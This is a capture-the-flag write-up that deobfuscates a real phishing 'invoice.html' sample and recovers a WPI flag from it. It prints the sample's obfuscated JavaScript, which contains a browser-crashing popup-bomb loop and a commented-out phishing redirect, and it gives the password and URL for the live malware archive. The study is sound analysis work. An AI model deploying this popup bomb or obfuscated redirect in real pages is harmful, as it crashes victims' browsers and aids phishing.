Tags: re 

Rating:

# danger-Live-and-Malicious-Code

## Description

Like the title says, this challenge is dangerous and contains live malware.

Shoutout to the hacker that I stole this challenge from. Sadly I can't give them credit because they sent the phish from a compromised email, but it's literally their code. I just defanged it (a little bit — it will still crash your web browser (usually), so don't test that outside of a VM) and stuck a WPI flag in here.

To prevent accidental execution, the file has been zipped with the password "I_understand_that_this_challenge_contains_LIVE_MALWARE". Extract and open it only inside a disposable VM.

http://us-east-1.linodeobjects.com/wpictf-challenge-files/invoice.zip

made by: The_Abjuri5t (John F.)

## Download and inspect the code

```
kali@kali:~/Downloads/wipctf$ wget http://us-east-1.linodeobjects.com/wpictf-challenge-files/invoice.zip
--2020-04-18 16:02:14-- http://us-east-1.linodeobjects.com/wpictf-challenge-files/invoice.zip
Resolving us-east-1.linodeobjects.com (us-east-1.linodeobjects.com)... 173.255.231.96, 45.79.157.59, 96.126.106.143, ...
Connecting to us-east-1.linodeobjects.com (us-east-1.linodeobjects.com)|173.255.231.96|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 729 [application/zip]
Saving to: ‘invoice.zip’

invoice.zip 100%[==================================>] 729 --.-KB/s in 0s

2020-04-18 16:02:14 (107 MB/s) - ‘invoice.zip’ saved [729/729]

kali@kali:~/Downloads/wipctf$ unzip invoice.zip
Archive: invoice.zip
[invoice.zip] invoice.html password:
inflating: invoice.html

kali@kali:~/Downloads/wipctf$ ls -l
total 8
-rw-r--r-- 1 kali kali 1243 Feb 22 22:29 invoice.html
-rw-r--r-- 1 kali kali 729 Apr 14 21:29 invoice.zip

kali@kali:~/Downloads/wipctf$ cat invoice.html
<html>
<head>
<title></title>
</head>
<body>
<script>var a = ['ps:','cte','5df','se_','toS','ing','tri','sub','lac','ryt','d}.','cod','pro','_no','ran','ing','dom','str','ete','rep'];function abc(def) { popupWindow = window.open( def,'popUpWindow','height=666,width=666,left=666,top=666') }(function(c, d) {var e = function(f) {while (--f) {c['push'](c['shift']());}};e(++d);}(a, 0xa8));var b = function(c, d) {c = c - 0x0;var e = a[c];return e;};var c = 'htt' + b('0xc') + '//t' + b('0x1') + b('0xe') + 'xc-' + 'rWP' + 'I';var d = '{Oh' + b('0x5') + b('0xf') + b('0x4') + b('0x3') + b('0x7') + '_d';var e = b('0xa') + b('0xd') + b('0x2') + 'net' + '/';var f = Math[b('0x6') + b('0x8')]()[b('0x10') + b('0x12') + 'ng'](0x6)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf) + Math['ran' + 'dom']()[b('0x10') + b('0x12') + 'ng'](0x10)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf);var g = Math['ran' + 'dom']()[b('0x10') + b('0x12') + 'ng'](0x24)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf) + Math[b('0x6') + b('0x8')]()['toS' + b('0x12') + 'ng'](0x24)[b('0x13') + b('0x9') + b('0x11')](0x2, 0xf);/*location[b('0xb') + b('0x0') + 'e'](c + d + e + '?' + f + '=' + g);*/for(var i=1;i===i;i++){abc(self.location,'_blank');}</script></body>
</html>
```

## Analysis

Use `uglifyjs -b` (beautify) to reformat that JavaScript. Note that `-b` only restores whitespace and rewrites the hex literals as decimal (`0xa8` → `168`, `c - 0x0` → `c - 0`); the string-table obfuscation is untouched, and the block comment is dropped, so the defanged `location[b('0xb') + b('0x0') + 'e'](...)` redirect (i.e. `location.replace`) from the original no longer appears in the output below.

```javascript
// Obfuscator string table. The entries are not in reading order: the IIFE below
// rotates the array before b() is ever called, so the indices passed to b('0x..')
// only make sense after that rotation.
var a = [ "ps:", "cte", "5df", "se_", "toS", "ing", "tri", "sub", "lac", "ryt", "d}.", "cod", "pro", "_no", "ran", "ing", "dom", "str", "ete", "rep" ];

// Popup helper: opens a 666x666 window on `def`. Only one parameter is declared,
// so the second argument passed at the call site below ("_blank") is ignored.
// `popupWindow` is assigned without a declaration (implicit global).
function abc(def) {
popupWindow = window.open(def, "popUpWindow", "height=666,width=666,left=666,top=666");
}

// Self-invoking rotation: e(169) runs `while (--f)` 168 times, each pass moving
// the first element to the end. 168 % 20 == 8, so the table is rotated left by
// eight positions (a[0] becomes "lac").
(function(c, d) {
var e = function(f) {
while (--f) {
c["push"](c["shift"]());
}
};
e(++d);
})(a, 168);

// Decoder: the hex string (e.g. "0xc") is coerced to a number by `c - 0` and used
// as an index into the rotated table. The second parameter is never used.
var b = function(c, d) {
c = c - 0;
var e = a[c];
return e;
};

// Static strings assembled from the rotated table; their decoded values are:
//   c -> "https://tryt5dfxc-rWPI"
var c = "htt" + b("0xc") + "//t" + b("0x1") + b("0xe") + "xc-" + "rWP" + "I";

//   d -> "{Oh_nose_procoding_d"
var d = "{Oh" + b("0x5") + b("0xf") + b("0x4") + b("0x3") + b("0x7") + "_d";

//   e -> "etected}.net/"
var e = b("0xa") + b("0xd") + b("0x2") + "net" + "/";

// f and g resolve to Math["random"]().toString(radix).substring(2, 15) pairs
// (base 6 + base 16 for f, base 36 + base 36 for g): random tokens, not flag
// material. In the original sample they were the query-string key and value of
// the commented-out location.replace(c + d + e + '?' + f + '=' + g) call.
var f = Math[b("0x6") + b("0x8")]()[b("0x10") + b("0x12") + "ng"](6)[b("0x13") + b("0x9") + b("0x11")](2, 15) + Math["ran" + "dom"]()[b("0x10") + b("0x12") + "ng"](16)[b("0x13") + b("0x9") + b("0x11")](2, 15);

var g = Math["ran" + "dom"]()[b("0x10") + b("0x12") + "ng"](36)[b("0x13") + b("0x9") + b("0x11")](2, 15) + Math[b("0x6") + b("0x8")]()["toS" + b("0x12") + "ng"](36)[b("0x13") + b("0x9") + b("0x11")](2, 15);

// Popup bomb: `i === i` is always true for a number, so this loop never ends and
// every iteration opens another copy of the current page. This is the "crash your
// browser" part and must be removed before the rest of the script is executed.
for (var i = 1; i === i; i++) {
abc(self.location, "_blank");
}
```

The `for (var i = 1; i === i; i++)` loop at the bottom never terminates (`i === i` is always true for a number), and every iteration calls `window.open` on the current page — a popup bomb, which is what crashes the browser. We definitely don't want to run that, so delete it before executing anything. `b(x)` simply indexes the rotated string table `a` (the IIFE rotates it 168 times, i.e. 8 positions), so `c`, `d` and `e` are static strings; in the original sample they formed the phishing URL passed to the commented-out `location.replace(c + d + e + '?' + f + '=' + g)`. `f` and `g` are random `Math.random().toString(radix).substring(2, 15)` tokens for the query string and carry no flag material — the flag is hidden in the hostname built from `c`, `d` and `e`.

## Solution

Let's remove the popup loop, print the remaining variables out and see what happens. Still do this inside the VM: the page below executes the attacker's decoding code unchanged, it is just no longer weaponised.

```html
<html>
<head>
<title></title>
</head>
<body>
<script>
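// Decoder harness for the invoice.html sample. Everything the malware computes is
// kept; the popup bomb (`for (var i = 1; i === i; i++) abc(...)`) is left out, and
// the results are rendered as text rather than via document.write, so none of the
// attacker-derived strings are ever parsed as HTML. Run it only in a throwaway VM.

// Obfuscator string table, rotated below before b() is used.
const a = [ "ps:", "cte", "5df", "se_", "toS", "ing", "tri", "sub", "lac", "ryt", "d}.", "cod", "pro", "_no", "ran", "ing", "dom", "str", "ete", "rep" ];

// The sample's IIFE rotates the table left 168 times (168 % 20 == 8 positions),
// so after this a[0] === "lac".
for (let k = 0; k < 168; k += 1) {
  a.push(a.shift());
}

// Decoder: the sample coerces the hex string with `c - 0`; Number() does the same
// for "0x.." inputs and indexes the rotated table.
const b = (hexIndex) => a[Number(hexIndex)];

// Static strings: c -> "https://tryt5dfxc-rWPI"
const c = "htt" + b("0xc") + "//t" + b("0x1") + b("0xe") + "xc-" + "rWP" + "I";

// d -> "{Oh_nose_procoding_d"
const d = "{Oh" + b("0x5") + b("0xf") + b("0x4") + b("0x3") + b("0x7") + "_d";

// e -> "etected}.net/"
const e = b("0xa") + b("0xd") + b("0x2") + "net" + "/";

// f and g: Math.random().toString(radix).substring(2, 15) pairs (base 6 + 16, then
// base 36 + 36) — random query-string tokens, different on every run, no flag inside.
const f = Math[b("0x6") + b("0x8")]()[b("0x10") + b("0x12") + "ng"](6)[b("0x13") + b("0x9") + b("0x11")](2, 15) + Math["ran" + "dom"]()[b("0x10") + b("0x12") + "ng"](16)[b("0x13") + b("0x9") + b("0x11")](2, 15);

const g = Math["ran" + "dom"]()[b("0x10") + b("0x12") + "ng"](36)[b("0x13") + b("0x9") + b("0x11")](2, 15) + Math[b("0x6") + b("0x8")]()["toS" + b("0x12") + "ng"](36)[b("0x13") + b("0x9") + b("0x11")](2, 15);

// One line per variable; `${a}` joins the array with commas exactly like "a: " + a did.
const report = [
  `a: ${a}`,
  `b: ${b}`,
  `c: ${c}`,
  `d: ${d}`,
  `e: ${e}`,
  `f: ${f}`,
  `g: ${g}`,
].join("\n");

if (typeof document !== "undefined") {
  // textContent, not document.write/innerHTML: the decoded strings are attacker data.
  const pre = document.createElement("pre");
  pre.textContent = report;
  document.body.appendChild(pre);
} else {
  // Lets the same decoder run under `node` with no browser at all.
  console.log(report);
}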
</script>
</body>
</html>
```

Save the modified page as `invoice_mod.html` (popup loop removed, output statements added), open it in Firefox inside the VM and get:

```
a: lac,ryt,d}.,cod,pro,_no,ran,ing,dom,str,ete,rep,ps:,cte,5df,se_,toS,ing,tri,sub
b: function(c, d) { c = c - 0; var e = a[c]; return e; }
c: https://tryt5dfxc-rWPI
d: {Oh_nose_procoding_d
e: etected}.net/
f: 444423500012190de9ae4937da
g: deygcrb1hmfhgg1r9kty5a
```

Combining the trailing `WPI` from `c` with `d` and the `etected}` from `e` (the phishing hostname), the flag is:

```
WPI{Oh_nose_procoding_detected}
```

Original writeup (https://github.com/dobsonj/ctf/blob/master/writeups/2020/wpictf/danger-Live-and-Malicious-Code).